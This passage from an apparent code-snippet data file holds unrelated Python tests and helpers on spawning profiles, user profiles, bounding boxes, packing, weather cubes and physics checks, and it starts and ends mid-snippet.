Intersection(center, radius, speed_limit)\n\n assert not i.get_spawning_profile_list()\n\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n spawn2 = SpawningProfile(\"spawn2\", default_driver, default_vehicle)\n\n i.add_spawning_profile(default_spawn)\n\n assert i.get_spawning_profile_list()\n assert len(i.get_spawning_profile_list()) == 1\n\n i.add_spawning_profile(spawn2)\n\n assert len(i.get_spawning_profile_list()) == 2", "def test_xml_ibox(self):\n # Return to new line\n print\n\n # Create the box\n self.mypbox = Pbox(self.myiterativedesc)\n\n # Test raises\n self.assertRaises(ValueError, self.mypbox)\n\n # Test execution\n self.mypbox.inputs.inp = \"str\"\n self.mypbox()\n self.assertEqual(self.mypbox.outputs.outp.value, \"str0str1\")\n\n if 0:\n from PySide import QtGui\n import sys\n from casper.view import PipelineView\n app = QtGui.QApplication.instance()\n if app is None:\n app = QtGui.QApplication(sys.argv)\n pview = PipelineView(self.mypbox)\n pview.show()\n app.exec_()", "def test_profile_image_requested_field(self):\n user_2 = UserFactory.create(password=self.password)\n # Ensure that parental controls don't apply to this user\n user_2.profile.year_of_birth = 1970\n user_2.profile.save()\n source_threads = [\n self.create_source_thread(),\n self.create_source_thread({\"user_id\": str(user_2.id), \"username\": user_2.username}),\n ]\n\n self.register_get_user_response(self.user, upvoted_ids=[\"test_thread\"])\n self.register_get_threads_response(source_threads, page=1, num_pages=1)\n self.create_profile_image(self.user, get_profile_image_storage())\n self.create_profile_image(user_2, get_profile_image_storage())\n\n response = self.client.get(\n self.url,\n {\"course_id\": str(self.course.id), \"requested_fields\": \"profile_image\"},\n )\n assert response.status_code == 200\n response_threads = json.loads(response.content.decode('utf-8'))['results']\n\n for response_thread in response_threads:\n expected_profile_data = self.get_expected_user_profile(response_thread['author'])\n response_users = response_thread['users']\n assert expected_profile_data == response_users[response_thread['author']]", "def test_creation_profile_2():\n assert tuple_NT[0][1] == LIST_dict[0]['sex'], \"sex of profile is not getting stored properly\"", "def test_Box2D(box_coordinates, score, test_point):\n box2D = Box2D(box_coordinates, score)\n assert (box2D.contains(test_point))", "def test_if_paper_beats_rock():\n\tresult = game.evaluate_game('paper', 'rock')\n\tassert result == 'User'", "async def test_basic_profile(players, strats):\n game = gamegen.game(players, strats)\n basesched = gamesched.gamesched(game)\n sched = canonsched.canon(basesched)\n assert np.all(sched.num_role_strats > 1)\n pay = await sched.sample_payoffs(sched.random_profile())\n assert pay.size == sched.num_strats\n assert str(sched) == str(basesched)", "def helper():\n for mode in PackingMode:\n for bin_algo in PackingBin:\n for size, w, h in ('big_enough', 50, 50), ('too_small', 5, 5):\n name = '_'.join(('test', mode, bin_algo, size))\n print(\"\"\"\\\n def %s(self):\n # create bins that are %s to hold the rectangles\n p = self._common(PackingMode.%s, PackingBin.%s, %s, %s)\"\"\" %\n (name, size.replace('_', ' '), mode, bin_algo, w, h))\n if size == 'big_enough':\n print(\"\"\"\\\n # check that bins were created\n self.assertGreater(len(p.bin_list()), 0)\n # check that all of the rectangles made it in\n self.assertEqual(len(p.rect_list()), len(self.rectangles))\n\"\"\")\n else:\n print(\"\"\"\\\n # check that none of the rectangles made it in\n self.assertEqual(len(p.rect_list()), 0)\n\"\"\")", "def test_get_all_boxes(self, postfix_directory):\n print(\"Test_All_Boxes\")\n protein_file = os.path.join(postfix_directory, \"PfATP4.pdb\")\n ligand_file = os.path.join(postfix_directory, \"SJ733.pdb\")\n coords = rdkit_util.load_molecule(protein_file)[0]\n\n boxes = dc.dock.binding_pocket.get_all_boxes(coords)\n assert isinstance(boxes, list)\n # Pocket is of form ((x_min, x_max), (y_min, y_max), (z_min, z_max))\n for pocket in boxes:\n assert len(pocket) == 3\n assert len(pocket[0]) == 2\n assert len(pocket[1]) == 2\n assert len(pocket[2]) == 2\n (x_min, x_max), (y_min, y_max), (z_min, z_max) = pocket\n assert x_min < x_max\n assert y_min < y_max\n assert z_min < z_max", "def test_instance_profile_exists(self) -> None:\n self.assertTrue(self.validate_instance_profile('s3-access-role', is_prod=self.prod_env))", "def check_profile(args):\n with_dataset(args, Dataset._check_profile)", "def inner_test(param: models.Game):\n pass", "def test_basic(self):\n plugin_instance = ProbabilitiesFromPercentiles2D(self.test_cube,\n self.new_name)\n self.assertEqual(plugin_instance.output_name, self.new_name)", "def test_creation_profile_4():\n assert tuple_NT[0][3] == LIST_dict[0]['blood_group'], \"blood_group of profile is not getting stored properly\"", "def test_create_with_profile(self):\n # make sure the guest not exists\n self.sdkapi.guest_create(self.userid, 1, 1024,\n user_profile=CONF.zvm.user_profile)\n self.assertTrue(\n self.test_util.wait_until_create_userid_complete(self.userid))", "def test(self):\n img_gen, self.loss_reg, self.parsav = self.net_G(self.input_P1, self.input_P2, self.input_BP1, self.input_BP2, self.input_SPL1, self.input_SPL2)\n ## test flow ##\n\n self.save_results(img_gen, data_name='vis')\n if self.opt.save_input or self.opt.phase == 'val':\n self.save_results(self.input_P1, data_name='ref')\n self.save_results(self.input_P2, data_name='gt')\n result = torch.cat([self.input_P1, img_gen, self.input_P2], 3)\n self.save_results(result, data_name='all')", "def negative_test_for_check_general_session(profile_obj):\n status = True\n\n logger._log_to_console_and_log_file(\"### Testing the 'General' session ###\")\n\n # LIST_OF_TESTS specify a list of elements to be validated in the \"General\" page\n # For each element of the list, we add the following information:\n # [0] = The locator of the field that we'll input the data (e.g. FusionPage.DescriptionEditBox)\n # [1] = The input data (e.g. MyProfile, !@#%&&*, blablabla, etc...)\n # [2] = The locator of the error message (e.g. FusionPage.ErrorMessage)\n # [3] = The Message name that will be displayed at the console and logs\n for profile in profile_obj:\n LIST_OF_TESTS = [[None, \"\", FusionServerProfilesPage.ID_WARNING_FIELD_REQUIRED, \"ID_WARNING_FIELD_REQUIRED\"],\n [FusionServerProfilesPage.ID_SERVER_HARDWARE_TEXT_BOX, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_SERVERHARDWARE, \"ID_WARNING_INVALID_SERVERHARDWARE\"],\n [FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_SERVER_HARDWARE_TYPE, \"ID_WARNING_INVALID_SERVER_HARDWARE_TYPE\"],\n [FusionServerProfilesPage.ID_ENCLOSURE_GROUP_TEXT_BOX, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_ENCLOSURE_GROUP, \"ID_WARNING_INVALID_ENCLOSURE_GROUP\"],\n [FusionServerProfilesPage.ID_SERVER_HARDWARE_TEXT_BOX, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_SERVERHARDWARE, \"ID_WARNING_INVALID_SERVERHARDWARE\"],\n [FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_SERVER_HARDWARE_TYPE, \"ID_WARNING_INVALID_SERVER_HARDWARE_TYPE\"],\n [FusionServerProfilesPage.ID_ENCLOSURE_GROUP_TEXT_BOX, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_ENCLOSURE_GROUP, \"ID_WARNING_INVALID_ENCLOSURE_GROUP\"]]\n logger._log_to_console_and_log_file(\"Testing using MISSING information and with special chars\")\n for test in LIST_OF_TESTS:\n # Fill \"Server hardware\" if needed.\n if test[0] == FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE:\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_COMBO_SERVER_HARDWARE_DROPDOWN)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_SERVER_HARDWARE_UNASSIGNED)\n ui_lib.wait_for_element_and_input_text(FusionServerProfilesPage.ID_INPUT_SERVER_PROFILE_NAME, \"Name\")\n if test[0] is not None:\n ui_lib.wait_for_element_and_input_text(test[0], test[1])\n ui_lib.wait_for_element_and_click(test[0])\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_BTN_CREATE_SERVER_PROFILE)\n if not correctly_executed(ui_lib.wait_for_element_visible, test[2], test[3]):\n status = False\n if not status:\n ui_lib.fail_test(\"At least one error message was not displayed\")", "def draw_person_boxes(self, frame, boxes, probs):\n # convert color space for numpy\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # for all the boxes:\n for (box, prob) in zip(boxes, probs):\n \n # extract the properties of the box and text:\n (startX, startY, endX, endY) = box.astype(\"int\")\n label = \"{}: {:.2f}%\".format(\"Person\", prob * 100)\n font = cv2.FONT_HERSHEY_SIMPLEX\n font_scale = 0.7\n thickness = 1\n text_size, _ = cv2.getTextSize(label, font, font_scale, thickness)\n text_w, text_h = text_size\n \n text_color_bg = (0,0,0) # black bg for text\n text_color = (255,255,255) # white text\n box_color = (255,0,0) # red box\n \n # draw the bb prediction on the frame\n cv2.rectangle(frame, (startX, startY), (endX, endY), box_color , 1)\n \n # include text:\n y = startY - text_h if startY - text_h > text_h else startY + text_h\n cv2.rectangle(frame, (startX, y - text_h), (startX + text_w, startY-1), text_color_bg, -1)\n cv2.putText(frame, label, (startX, y), font, font_scale, text_color, thickness)\n\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n return frame", "def test_boxscore_player_stats(self):\n test_v_player_stat = self.BS.vTeam_player_stats[0]['firstName']\n test_answer_v = 'Isaac'\n test_h_player_stat = self.BS.hTeam_player_stats[0]['firstName']\n test_answer_h = 'Pascal'\n self.assertEqual(test_v_player_stat, test_answer_v)\n self.assertEqual(test_h_player_stat, test_answer_h)", "def test_components_profile(self):\r\n\t\tprofile = Profile.objects.get(bio=\"I'm a female profile with inserted components\")\r\n\t\tself.assertEqual(self.u1.profile, profile)", "def test_generate_paulis(generators, num_qubits, result):\n pauli_ops = qml.paulix_ops(generators, num_qubits)\n for p1, p2 in zip(pauli_ops, result):\n assert p1.compare(p2)", "def run_tests():\n db.connect()\n db.create_tables([Result])\n\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n number_of_generations = int(config[\"genetics\"][\"number_of_generations\"])\n\n test_file_paths = []\n\n for file in os.listdir(\"resources/tests/umpalettierung\"):\n if file.endswith(\".csv\"):\n test_file_paths.append(os.path.join(\"resources/tests/umpalettierung\", file))\n\n for path in test_file_paths:\n start = timeit.default_timer()\n boxes_to_pack, box_types = read_input(path)\n size_of_population = int(config[\"genetics\"][\"population_multiplier\"]) * len(boxes_to_pack)\n test_name_list = []\n for box_type in box_types:\n test_name_list.append(f\"{box_type.identifier[:5]}_{box_type.quantity()}\")\n test_name_list.sort()\n test_name = '.'.join(test_name_list)\n print(\n f\"Running {test_name} with {number_of_generations} generations with a population size of {size_of_population}\")\n print(box_types)\n pop, stats, hof = run_genetics(boxes_to_pack, box_types, number_of_generations, size_of_population)\n get_packing_order(hof[0], boxes_to_pack, box_types, test_name=test_name)\n stop = timeit.default_timer()\n save_results(test_name, start, stop, len(pop), number_of_generations, pop, stats)", "def test_get_game_boxscore(self):\n msg = \"Response status is not 200\"\n response = self.api.get_game_boxscore(self.game_id)\n self.assertEqual(response.status_code, 200, msg)", "def testIdentity(self):\r\n for profile in self.profiles:\r\n self.assertEqual(profile.edit_distance(profile), 0)", "def test_private_rooms_have_profiles_requested(self) -> None:\n\n async def get_remote_profile(\n user_id: str, ignore_backoff: bool = True\n ) -> JsonDict:\n if user_id == \"@bruce:remote\":\n return {\n \"displayname\": \"Sir Bruce Bruceson\",\n \"avatar_url\": \"mxc://remote/789\",\n }\n else:\n raise ValueError(f\"unable to fetch {user_id}\")\n\n with patch.object(self.profile_handler, \"get_profile\", get_remote_profile):\n # Continue from the earlier test...\n self.test_private_rooms_do_not_have_profiles_collected()\n\n # Advance by a minute\n self.reactor.advance(61.0)\n\n profiles = self.get_success(\n self.user_dir_helper.get_profiles_in_user_directory()\n )\n self.assertEqual(\n profiles.get(\"@bruce:remote\"),\n ProfileInfo(\n display_name=\"Sir Bruce Bruceson\", avatar_url=\"mxc://remote/789\"\n ),\n )", "def test_name_of_cube(self):\n result = calculate_sleet_probability(self.snow_prob_cube, self.rain_prob_cube)\n name = \"probability_of_sleet\"\n self.assertEqual(result.long_name, name)", "def testAlignedProfile(self):\n # Use Plot backend widget to submit mouse events\n widget = self.plot.getWidgetHandle()\n for method in ('sum', 'mean'):\n with self.subTest(method=method):\n # 2 positions to use for mouse events\n pos1 = widget.width() * 0.4, widget.height() * 0.4\n pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n for action in (self.toolBar.hLineAction, self.toolBar.vLineAction):\n with self.subTest(mode=action.text()):\n # Trigger tool button for mode\n action.trigger()\n # Without image\n self.mouseMove(widget, pos=pos1)\n self.mouseClick(widget, qt.Qt.LeftButton, pos=pos1)\n\n # with image\n self.plot.addImage(\n numpy.arange(100 * 100).reshape(100, -1))\n self.mousePress(widget, qt.Qt.LeftButton, pos=pos1)\n self.mouseMove(widget, pos=pos2)\n self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n\n self.mouseMove(widget)\n self.mouseClick(widget, qt.Qt.LeftButton)\n\n manager = self.toolBar.getProfileManager()\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break", "def testIdentity(self):\n for profile in self.profiles:\n self.assertEqual(profile.edit_distance(profile), 0)", "def test_validate_payment_profile(self):\n self.cim.validate_payment_profile(\n customer_profile_id=u\"222\",\n customer_payment_profile_id=u\"444\",\n customer_address_id=u\"555\",\n )", "def generateBoxPoints(frame_resolution, min_dim_rect = 80, max_dim_rect = 160, limit_x = (-1, -1), limit_y = (-1, -1)):\n \n randint = np.random.randint\n \n #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n # Generate point 1 (pt1)\n \n if(limit_x != (-1, -1)): x1 = randint(limit_x[0], limit_x[1])\n else: x1 = randint(0, frame_resolution[0])\n \n if(limit_y != (-1, -1)): y1 = randint(limit_y[0], limit_y[1])\n else: y1 = randint(0, frame_resolution[1])\n \n pt1 = (x1, y1)\n \n #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # Generate point 2 (pt2)\n \n bad_point = True\n \n # Since the random generation pt2 can have invalid coordinate. So the script continue to generat point until a valid point is generated\n while(bad_point):\n x2 = x1 + random.choice((-1, 1)) * randint(min_dim_rect, max_dim_rect)\n y2 = y1 + random.choice((-1, 1)) * randint(min_dim_rect, max_dim_rect)\n \n if not (x2 > frame_resolution[0] or x2 < 0 or y2 > frame_resolution[1] or y2 < 0): bad_point = False\n \n if(limit_x != (-1, -1) and (x2 < limit_x[0] or x2 > limit_x[1])): bad_point = True\n if(limit_y != (-1, -1) and (y2 < limit_y[0] or y2 > limit_y[1])): bad_point = True\n \n pt2 = (x2, y2)\n \n #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n return pt1, pt2", "def test_rectangle_yank(self):\n before_b = \"\"\"\\\n before\n aaaxxxbbb\n aaaxxxbbb\n aaaxxxbbb\n aaaxxxbbb\n after\n \"\"\"\n after_b = \"\"\"\\\n before\n aaaY1Ybbb\n aaaY2Ybbb\n aaaY3Ybbb\n aaaY4Ybbb\n after\n \"\"\"\n # A hack. The command tests for g.app.unitTesting.\n g.app.unitTesting = True\n try:\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"2.3\", \"5.6\"),\n after_sel=(\"2.3\", \"5.6\"),\n command_name=\"rectangle-yank\",\n )\n finally:\n g.app.unitTesting = False", "def generateFinalResult(self):\n if self.__testResult == 'FAIL':\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n elif self.__testResult == 'PASS':\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n elif self.__testResult == 'NONE':\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY) \n self.__testResult = 'PASS'\n #else:\n total_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"total_count\", TestScriptSymbolTable.test_result_tab))\n pass_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"pass_count\", TestScriptSymbolTable.test_result_tab))\n fail_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"fail_count\", TestScriptSymbolTable.test_result_tab))\n conditional_chk_flag = int(TestScriptSymbolTable.get_value_from_sym_tab(\"conditional_chk_flag\", TestScriptSymbolTable.test_result_tab))\n num_of_pass_required = int(TestScriptSymbolTable.get_value_from_sym_tab(\"num_of_pass_required\", TestScriptSymbolTable.test_result_tab))\n \n if total_count >= 1:\n if conditional_chk_flag == 1:\n if num_of_pass_required <= pass_count:\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'PASS'\n else:\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'FAIL'\n else:\n if fail_count > 0:\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'FAIL'\n else:\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'PASS'\n else:\n if GlobalConfigFiles.curr_tc_name != \"\":\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n logging.debug(\"\\n TEST COMPLETED without FINAL RESULT...\")\n\n self.__testResult = 'FAIL'\n\n self.tmsPacket.TestResult = self.__testResult\n if GlobalConfigFiles.curr_tc_name != \"\":\n logging.info(\"\\n FINAL TEST RESULT ---> %15s\", self.__testResult)\n logging.info(' END: TEST CASE [%s]', GlobalConfigFiles.curr_tc_name)\n\n Util.set_color(Util.FOREGROUND_WHITE)\n GlobalConfigFiles.test_result = self.__testResult\n\n self.tmsPacket.TimeStamp = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.localtime())\n if GlobalConfigFiles.curr_tc_name != \"\":\n self.tmsPacket.writeTMSJson()\n\n return", "def drawBoxOfROI(scores_roi, boxes_roi, padding_ratio,\n margin_ratio, im_width, im_height, image_np):\n try:\n (left, right, top, bottom) = boxes_roi[0]\n padding_x = padding_ratio * (right - left)\n padding_y = padding_ratio * (bottom - top)\n margin_x = margin_ratio * (right - left)\n margin_y = margin_ratio * (bottom - top)\n padding_left = max(int(left - padding_x), 0)\n padding_top = max(int(top - padding_y), 0)\n padding_right = min(int(right + padding_x), im_width - 1)\n padding_bottom = min(int(bottom + padding_y), im_height - 1)\n margin_left = padding_left\n margin_top = max(int(top - margin_y), 0)\n margin_right = padding_right\n margin_bottom = padding_bottom\n b_have_hand = True\n image_clone_1 = image_np.copy()\n image_clone_2 = image_np.copy()\n image_extend = image_clone_1[margin_top:margin_bottom,\n margin_left:margin_right]\n image_roi = image_clone_2[padding_top:padding_bottom,\n padding_left:padding_right]\n cv2.rectangle(image_np, (margin_left, margin_top),\n (margin_right, margin_bottom), (0, 255, 255), 2, 1)\n cv2.putText(image_np, str(float('%.2f' % scores_roi[0])),\n (int(margin_left), int(margin_top)-2),\n cv2.FONT_HERSHEY_SIMPLEX, 0.75,\n (0, 255, 100), 2)\n print('here')\n return b_have_hand, image_roi, image_extend\n except Exception as e:\n b_have_hand = False\n image_roi = np.zeros((150, 150, 3), np.uint8)\n return b_have_hand, image_roi, image_roi", "def test_basic(self):\n new_name = \"probability_of_snowfall\"\n test_cube = set_up_percentiles_cube()\n inverse_ordering = False\n expected = ('<ProbabilitiesFromPercentiles2D: percentiles_'\n 'cube: {}, output_name: {}, inverse_ordering: {}'.format(\n test_cube, new_name, inverse_ordering))\n result = str(ProbabilitiesFromPercentiles2D(test_cube,\n new_name))\n self.assertEqual(result, expected)", "def verify_server_profile_status(expectedserverstatus, *profile_obj):\n\n logger._log_to_console_and_log_file(\"\")\n logger._log_to_console_and_log_file(\"Verifying the list of server hardwares present in the server Profile page..\")\n selenium2lib = ui_lib.get_s2l()\n\n # if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_PROFILE_LIST, PerfConstants.DEFAULT_SYNC_TIME):\n # logger._log_to_console_and_log_file(\"Sever Profile Page contains a Server Profile List Table and starting to verify the servers status..\")\n # else:\n # logger._warn(\"Sever Profile Page does not contains a Server Profile List Table and Hence failing the test..\")\n # return False\n\n if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_NO_SERVER_PROFILE, PerfConstants.DEFAULT_SYNC_TIME):\n logger._warn(\"Sever Profile Page does not contains a any Server and Hence failing the test..\")\n selenium2lib.capture_page_screenshot()\n return False\n # else:\n # logger._log_to_console_and_log_file(\"Sever Profile Page contains a Servers and starting to verify the servers status..\")\n\n # if not ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_SELECT_SERVER % serverhardware, PerfConstants.DEFAULT_SYNC_TIME):\n # logger._warn(\"Server Hardware : \" + serverhardware + \" is not present in the ServerList of the Server Profile page\")\n # return False\n # else:\n # logger._log_to_console_and_log_file(\"Server Hardware : \" + serverhardware + \" is present in the ServerList and Hence verifying for the status..\")\n\n for profile in profile_obj:\n server_hardware = profile.server\n\n logger._log_to_console_and_log_file(\"Verifying status for profile %s\" % profile.name)\n\n if server_hardware == 'unassigned':\n logger._log_to_console_and_log_file(\"Server hardware is unassigned and cannot verify the server's power status\")\n continue\n\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n BuiltIn().sleep(2) # wait for fields to load\n\n # ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_SELECT_SERVER % server_hardware)\n if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_SERVER_STATUS_OK, PerfConstants.DEFAULT_SYNC_TIME):\n if expectedserverstatus == 'OK':\n logger._log_to_console_and_log_file(\"Server status of server : \" + server_hardware + \" is in state : 'OK' as expected\")\n else:\n logger._log_to_console_and_log_file(\"Server status of server : \" + server_hardware + \" is in state : 'OK' as NOT expected\")\n selenium2lib.capture_page_screenshot()\n return False\n elif ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_SERVER_STATUS_ERROR, PerfConstants.DEFAULT_SYNC_TIME):\n ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_ERROR_WARN_MSG, PerfConstants.DEFAULT_SYNC_TIME)\n err_msg = selenium2lib.get_text(FusionServerProfilesPage.ID_ERROR_WARN_MSG)\n logger._log_to_console_and_log_file(\"Server status of server : \" + server_hardware + \" is in state : 'ERROR' with the error msg : '\" + err_msg + \"'\")\n if expectedserverstatus == 'ERROR':\n logger._log_to_console_and_log_file(\"Server status of server : is in state : 'ERROR' as expected\")\n else:\n logger._log_to_console_and_log_file(\"Server status of server : is in state : 'ERROR' as NOT expected\")\n selenium2lib.capture_page_screenshot()\n return False\n else:\n ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_ERROR_WARN_MSG, PerfConstants.DEFAULT_SYNC_TIME)\n err_msg = selenium2lib.get_text(FusionServerProfilesPage.ID_ERROR_WARN_MSG)\n logger._log_to_console_and_log_file(\"Server status of server : \" + server_hardware + \" is in state : 'WARNING' with the warning msg : '\" + err_msg + \"'\")\n if expectedserverstatus == 'WARNING':\n logger._log_to_console_and_log_file(\"Server status of server : is in state : 'WARNING' as expected\")\n else:\n logger._log_to_console_and_log_file(\"Server status of server : is in state : 'WARNING' as NOT expected\")\n selenium2lib.capture_page_screenshot()\n return False\n\n return True", "def test_profile(profile_manager):\n name = 'test_profile'\n yield profile_manager.create(name)\n if profile_manager.has_profile(name):\n profile_manager.delete(name)", "def test_boxnet(self):\n\t\timg = np.random.rand(2, 3, 256, 128)\n\t\t\n\t\tvgg = VGGNet()\n\t\tboxnet = BoxNet()\n\n\t\tfm = vgg(img)\n\t\tboxes = boxnet(fm)\n\n\t\tnp.testing.assert_equal(boxes.shape, (2,6,256/2**4,128/2**4))\n\n\t\t\"\"\" Dimension check with random shifts \"\"\"\n\n\t\t\"\"\" Visualize boxes with random shifts \"\"\"", "def test_profile_made(self):\n self.assertTrue(ImagerProfile.objects.count() == 5)", "def test_is_instance(self):\n self.assertTrue(isinstance(self.profile, Profile))", "def test_boundary_boxes(gt_detection_combo):\n found = False\n overlap_threshold = 0.7\n\n for found_box in gt_detection_combo.detected_boxes:\n if overlap_between(gt_detection_combo.gt_box, found_box) > overlap_threshold:\n found = True\n break\n\n assert found is True", "def check_benchmark_result(result, expectation):\n for storage_cfg, caches in result['cache_data'].items():\n for cache, percent_recorded in caches.items():\n if ((percent_recorded['min'] < expectation['min'])\n or (percent_recorded['avg'] < expectation['avg'])\n or (percent_recorded['max'] < expectation['max'])):\n return False\n return True", "def test_ML_check_profile_epem_ttx(self):\n\n self.setup_logFile_for_logger('madgraph.check_cmd')\n try:\n cmd = os.getcwd()\n self.do('import model loop_sm')\n if path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')):\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n \n # Make sure it works for an initial run\n self.do('check profile -reuse e+ e- > t t~ [virt=QCD]')\n self.assertEqual(cmd, os.getcwd())\n self.assertTrue(path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')))\n self.assertTrue(path.isfile(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx',\\\n 'SubProcesses/P0_epem_ttx/result.dat')))\n self.assertTrue(path.isfile(self.tmp_path['madgraph.check_cmd']))\n res = open(self.tmp_path['madgraph.check_cmd']).read()\n self.assertTrue('Generation time total' in res)\n self.assertTrue('Executable size' in res)\n self.assertTrue('Tool (DoublePrec for CT)' in res)\n self.assertTrue('Number of Unstable PS points' in res)\n self.assertTrue(res.count('NA')<=3)\n\n # Now for a Reuse-run\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)\n self.setup_logFile_for_logger('madgraph.check_cmd')\n self.do('check profile -reuse e+ e- > t t~ [virt=QCD]')\n self.assertEqual(cmd, os.getcwd())\n self.assertTrue(path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')))\n self.assertTrue(path.isfile(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx',\\\n 'SubProcesses/P0_epem_ttx/result.dat')))\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n self.assertTrue(path.isfile(self.tmp_path['madgraph.check_cmd']))\n res = open(self.tmp_path['madgraph.check_cmd']).read()\n self.assertTrue('Generation time total' in res)\n self.assertTrue('Executable size' in res)\n self.assertTrue('Tool (DoublePrec for CT)' in res)\n self.assertTrue('Number of Unstable PS points' in res)\n self.assertTrue(res.count('NA')<=11)\n except:\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)\n if path.isdir(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx')):\n shutil.rmtree(pjoin(MG5DIR,'SAVEDTMP_CHECK_epem_ttx'))\n raise\n self.setup_logFile_for_logger('madgraph.check_cmd',restore=True)", "def draw_boxes(image, results, min_score=0.2, max_boxes=10):\n results = sorted(results, key=lambda x: x['score'])\n results = results[0:max_boxes]\n for r in results:\n if r['score'] < min_score:\n continue\n draw_box(image, r['bounding_box'], labels[r['class_id']], r['score'])", "async def test_retrieve_one(self):\n expected = {\n '_id': 'id',\n 'name': 'name',\n 'version': 4,\n 'status': 'active'\n }\n rsps = respx.get(f'{PROVISIONING_API_URL}/users/current/provisioning-profiles/id') \\\n .mock(return_value=Response(200, json=expected))\n profile = await provisioning_client.get_provisioning_profile('id')\n assert rsps.calls[0].request.url == \\\n f'{PROVISIONING_API_URL}/users/current/provisioning-profiles/id'\n assert rsps.calls[0].request.headers['auth-token'] == 'header.payload.sign'\n assert profile == expected", "def test_parcel_profile():\n levels = np.array([1000., 900., 800., 700., 600., 500., 400.]) * units.mbar\n true_prof = np.array([303.15, 294.16, 288.026, 283.073, 277.058, 269.402,\n 258.966]) * units.kelvin\n\n prof = parcel_profile(levels, 30. * units.degC, 20. * units.degC)\n assert_array_almost_equal(prof, true_prof, 2)", "def _run_test_case(radio, lines):\n calc_reachable_surface_and_people(radio, lines)", "def test_get_spawning_profile_list():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n\n i = Intersection(center, radius, speed_limit)\n\n l = i.get_spawning_profile_list()\n\n assert not l\n\n i.add_spawning_profile(default_spawn)\n\n assert l\n\n assert len(l) == 1\n\n i.remove_spawning_profile(default_spawn)\n\n assert len(l) == 0\n assert not l", "def _get_boxes(self, output, mode=1):\n\n # Check dimensions\n if output.dim() == 3:\n output.unsqueeze_(0)\n\n # Variables\n cuda = output.is_cuda\n batch = output.size(0)\n h = output.size(2)\n w = output.size(3)\n\n # Compute xc,yc, w,h, box_score on Tensor\n lin_x = torch.linspace(0, w-1, w).repeat(h,1).view(h*w)\n lin_y = torch.linspace(0, h-1, h).repeat(w,1).t().contiguous().view(h*w)\n anchor_w = torch.Tensor(self.anchors[::2]).view(1, self.num_anchors, 1)\n anchor_h = torch.Tensor(self.anchors[1::2]).view(1, self.num_anchors, 1)\n if cuda:\n lin_x = lin_x.cuda()\n lin_y = lin_y.cuda()\n anchor_w = anchor_w.cuda()\n anchor_h = anchor_h.cuda()\n\n output_ = output.view(batch, self.num_anchors, -1, h*w) # -1 == 5+num_classes (we can drop feature maps if 1 class)\n output_[:,:,0,:].sigmoid_().add_(lin_x).div_(w) # X center\n 